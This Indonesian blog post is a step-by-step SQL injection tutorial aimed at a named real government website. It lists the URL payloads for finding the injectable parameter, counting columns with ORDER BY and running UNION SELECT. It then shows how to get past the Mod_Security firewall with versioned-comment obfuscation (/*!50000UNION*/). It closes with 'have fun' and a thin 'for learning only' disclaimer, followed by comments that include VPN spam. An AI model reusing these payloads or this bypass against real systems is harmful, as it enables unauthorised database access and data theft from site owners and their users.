Bypass Mod_Security SQLInjection ~ Cyberinfo

Demo : multan.gov.pk/files.php?id=1

Pertama seperti biasa cek web pulen atau tidak

multan.gov.pk/files.php?id=1' ==> Error

Kedua cari jumlah column

multan.gov.pk/files.php?id=1+order+by+1--+ ===> normal

multan.gov.pk/files.php?id=1+order+by+2--+ ===> normal

multan.gov.pk/files.php?id=1+order+by+3--+ ===> error

Berarti jumlah column ada 2

Selanjutnya

multan.gov.pk/files.php?id=-1+union+select+1,2--+

Nah hasilnya adalah

Not Acceptable!
An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

nah terdapat tulisan "this error was generated by Mod_Security" jadi sebelum kita dapat menginjectnya maka harus membypass mod security tersebut

untuk membypass Mod_Security ganti tulisan union select dengan
/*!50000UNION*//*!50000SELECT*/

Jadi hasilnya adalah

multan.gov.pk/files.php?id=-1/*!50000UNION*//*!50000SELECT*/1,2--+

Dan akhirnya muncullah Angka Ajaib

Untuk selanjutnya hanya tinggal melakukan inject seperti sql injection manual biasa ^_^ so have funn

NB: Semua penyalahgunaa pada tutorial diatas bukan merupakan tangging jawab dari Penulis. Di tulis hanya sebagai pembelajaran tentang security semata, Dosa Tanggung sendiri

2 komentar:

Alimin31 Januari 2017 pukul 20.51
thank u
BalasHapus
Balasan
David Marchal13 November 2018 pukul 22.03
Get the Fastest VPN for 2018 that allows you to access blocked and restricted content from anywhere in the world. Stream and Download with complete anonymity and security. FastestVPN service provider offers secure access and high speed. https://fastestvpn.com/
BalasHapus
Balasan

Tambahkan komentar

Cyberinfo

Media Teknologi dan Informasi

Menu

Minggu, 07 Juni 2015

Bypass Mod_Security SQLInjection

2 komentar:

Popular Posts

Categories

Blog Archive

Mengenai Saya